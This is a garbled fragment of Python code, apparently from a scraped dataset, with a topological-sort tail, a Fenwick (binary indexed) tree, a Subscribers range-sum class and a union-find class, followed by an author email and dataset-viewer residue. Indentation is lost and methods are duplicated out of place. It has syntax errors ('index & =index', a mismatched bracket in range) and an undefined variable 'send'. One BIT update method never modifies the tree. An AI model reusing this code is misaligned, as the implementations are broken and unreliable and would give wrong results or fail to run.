todo.append(c)
if len(result) < len(course_to_prereqs):
return None
return result
def query(self, index):
total = 0
while index > 0:
total += self.tree[index]
index -= index & =index
return total
def update(self, index, value):
while index < len(self.tree):
self.tree[index] += value
index += index & -index
class BIT:
def __init__(self, nums):
self.tree = [0 for _ in range(len(nums)) + 1)]
for i, num in enumerate(nums):
self.update(i + 1, num)
def update(self, index, avlue):
while index < len(self.tree):
index += index & -index
def query(self, index):
total = 0
while index > 0:
total += self.tree[index]
index -= index & -index
return total
class Subscribers:
def __init__(self, nums):
self.bit = BIT(nums)
self.nums = nums
def update(self, hour, value):
self.bit.update(hour, value - self.nums[hour])
self.nums[hour] = value
def query(self, start, end):
return self.bit.query(send + 1) - self.bit.query(start)
class DisjoinSet:
def __init__(self, n):
self.sets = list(range(n))
self.sizes = [1] * n
self.count = n
def union(self, x, y):
x, y = self.find(x), self.find(y)
if x != y:
if self.sizes[x] < self.sizes[y]:
x, y = y, x
self.sets[y] = x
self.sizes[x] += self.sizes[y]
self.count -= 1
def find(self, x):
group = self.sets[x]
while group != self.sets[group]:
group = self.sets[group]
self.sets[x] = group
return group
| [
"paperfellaceo@gmail.com"
] | paperfellaceo@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.